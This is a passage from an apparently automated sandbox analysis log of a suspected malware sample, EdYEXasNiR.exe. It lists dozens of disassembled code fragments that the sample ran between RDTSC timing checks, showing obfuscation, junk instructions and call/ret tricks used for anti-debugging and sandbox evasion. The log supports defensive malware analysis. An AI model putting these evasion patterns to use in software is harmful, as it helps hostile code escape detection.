                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6AE1 second address: EA6B1B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 sub dword ptr [ebp+122D2463h], esi 0x0000000f lea ebx, dword ptr [ebp+1245155Bh] 0x00000015 clc 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 js 00007FD358ED110Fh 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6B1B second address: EA6B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6B28 second address: EA6B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F13 second address: EC8F18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F18 second address: EC8F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F1E second address: EC8F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD358DA46E1h 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F36 second address: EC8F62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1107h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e js 00007FD358ED10F8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F62 second address: EC8F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F66 second address: EC8F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC6FE1 second address: EC6FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC6FE5 second address: EC7006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358ED1101h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jg 00007FD358ED10F6h 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC72D3 second address: EC72F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jmp 00007FD358DA46E6h 0x0000000b pop edx 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC72F6 second address: EC7300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD358ED10F6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7300 second address: EC7304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7481 second address: EC7487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC78C8 second address: EC78CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC78CE second address: EC78F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1100h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD358ED10FCh 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7D06 second address: EC7D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7D0C second address: EC7D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7D13 second address: EC7D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD358DA46D6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7D1D second address: EC7D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7E7D second address: EC7EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD358DA46E9h 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC81AB second address: EC81C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED10FBh 0x00000007 jo 00007FD358ED10F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC81C0 second address: EC81C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC86EE second address: EC86FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8B10 second address: EC8B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E87BB5 second address: E87BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E87BB9 second address: E87BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E87BBF second address: E87BC4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E87BC4 second address: E87BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FD358DA46D6h 0x0000000d jc 00007FD358DA46D6h 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ECFA5E second address: ECFA7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ECE2A0 second address: ECE2BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46E7h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED380D second address: ED3811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED3811 second address: ED3817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED3BEE second address: ED3BF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED3BF5 second address: ED3C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FD358DA46D8h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FD358DA46E5h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED3C22 second address: ED3C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FD358ED1103h 0x0000000b jmp 00007FD358ED10FDh 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E89792 second address: E897A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FD358DA46DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E897A0 second address: E897A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED7B99 second address: ED7B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED7CE2 second address: ED7CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED7E57 second address: ED7E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED7FFC second address: ED8002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED9B8B second address: ED9C06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD358DA46D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FD358DA46D8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FD358DA46D8h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ecx 0x0000004c call 00007FD358DA46D8h 0x00000051 pop ecx 0x00000052 mov dword ptr [esp+04h], ecx 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc ecx 0x0000005f push ecx 0x00000060 ret 0x00000061 pop ecx 0x00000062 ret 0x00000063 push eax 0x00000064 push ebx 0x00000065 jbe 00007FD358DA46DCh 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED9A40 second address: ED9A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDACAF second address: EDACC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46DDh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDACC0 second address: EDAD5B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD358ED10F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FD358ED1101h 0x00000013 jnp 00007FD358ED110Ah 0x00000019 jmp 00007FD358ED1104h 0x0000001e popad 0x0000001f nop 0x00000020 mov dword ptr [ebp+122D246Fh], esi 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D3175h], eax 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007FD358ED10F8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a jmp 00007FD358ED1107h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FD358ED1108h 0x00000057 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDD7DE second address: EDD7E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDD7E2 second address: EDD84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FD358ED10F8h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 xor si, 4800h 0x00000026 push 00000000h 0x00000028 add edi, dword ptr [ebp+122D2384h] 0x0000002e push 00000000h 0x00000030 mov esi, edi 0x00000032 mov esi, dword ptr [ebp+122D3851h] 0x00000038 xchg eax, ebx 0x00000039 jmp 00007FD358ED1109h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD358ED1101h 0x00000048 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDD84E second address: EDD854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE1F1D second address: EE1F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE1F21 second address: EE1F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 stc 0x00000009 push 00000000h 0x0000000b jl 00007FD358DA46E8h 0x00000011 call 00007FD358DA46DFh 0x00000016 mov ebx, edx 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b or dword ptr [ebp+122D1C69h], esi 0x00000021 mov dword ptr [ebp+122D2162h], ebx 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a jg 00007FD358DA46DCh 0x00000030 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE2F6E second address: EE2F73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE5016 second address: EE501A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE501A second address: EE5059 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD358ED10F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sub ebx, dword ptr [ebp+122D315Dh] 0x00000012 push 00000000h 0x00000014 movsx edi, di 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FD358ED10F8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov bx, si 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE20A8 second address: EE20B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE4008 second address: EE4091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jc 00007FD358ED10F6h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FD358ED10F8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b sbb di, FC3Eh 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov ebx, dword ptr [ebp+122D26DEh] 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 movsx ebx, ax 0x00000047 mov eax, dword ptr [ebp+122D001Dh] 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007FD358ED10F8h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000017h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 add dword ptr [ebp+122D2AA8h], edi 0x0000006d push FFFFFFFFh 0x0000006f mov edi, dword ptr [ebp+122D3226h] 0x00000075 mov ebx, dword ptr [ebp+122D3717h] 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e push ecx 0x0000007f push ebx 0x00000080 pop ebx 0x00000081 pop ecx 0x00000082 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE6062 second address: EE6066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE7035 second address: EE7046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jns 00007FD358ED10F6h 0x00000010 pop eax 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE8066 second address: EE806C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE718E second address: EE7194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE806C second address: EE8087 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FD358DA46D6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FD358DA46DAh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE901E second address: EE9023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE9210 second address: EE92BB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD358DA46D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD358DA46D8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D394Dh] 0x0000002b or dword ptr [ebp+122D359Bh], ebx 0x00000031 push dword ptr fs:[00000000h] 0x00000038 jnl 00007FD358DA46DAh 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 add dword ptr [ebp+122D199Dh], eax 0x0000004b mov eax, dword ptr [ebp+122D0331h] 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 call 00007FD358DA46D8h 0x00000059 pop eax 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e add dword ptr [esp+04h], 0000001Dh 0x00000066 inc eax 0x00000067 push eax 0x00000068 ret 0x00000069 pop eax 0x0000006a ret 0x0000006b mov di, si 0x0000006e and edi, 120E23DCh 0x00000074 push FFFFFFFFh 0x00000076 jp 00007FD358DA46DBh 0x0000007c mov ebx, 05CD329Bh 0x00000081 nop 0x00000082 push eax 0x00000083 push edx 0x00000084 jmp 00007FD358DA46DDh 0x00000089 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEBDE6 second address: EEBE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FD358ED10F8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FD358ED10F8h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e jmp 00007FD358ED1108h 0x00000043 jg 00007FD358ED10FCh 0x00000049 push 00000000h 0x0000004b js 00007FD358ED10FCh 0x00000051 sub edi, 1D537A98h 0x00000057 push eax 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEBE6B second address: EEBE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EECDA6 second address: EECDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEB0BF second address: EEB0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEA14A second address: EEA14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEB0C3 second address: EEB0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FD358DA46E8h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jc 00007FD358DA46DCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EECF00 second address: EECFD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED10FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD358ED1109h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 xor dword ptr [ebp+122D1994h], ebx 0x00000018 or edi, dword ptr [ebp+122D32F9h] 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov bx, 6FD6h 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 sbb ebx, 41ECFB09h 0x00000036 mov eax, dword ptr [ebp+122D066Dh] 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FD358ED10F8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 call 00007FD358ED10FEh 0x0000005b jmp 00007FD358ED10FBh 0x00000060 pop ebx 0x00000061 push FFFFFFFFh 0x00000063 push 00000000h 0x00000065 push ecx 0x00000066 call 00007FD358ED10F8h 0x0000006b pop ecx 0x0000006c mov dword ptr [esp+04h], ecx 0x00000070 add dword ptr [esp+04h], 0000001Ch 0x00000078 inc ecx 0x00000079 push ecx 0x0000007a ret 0x0000007b pop ecx 0x0000007c ret 0x0000007d nop 0x0000007e push eax 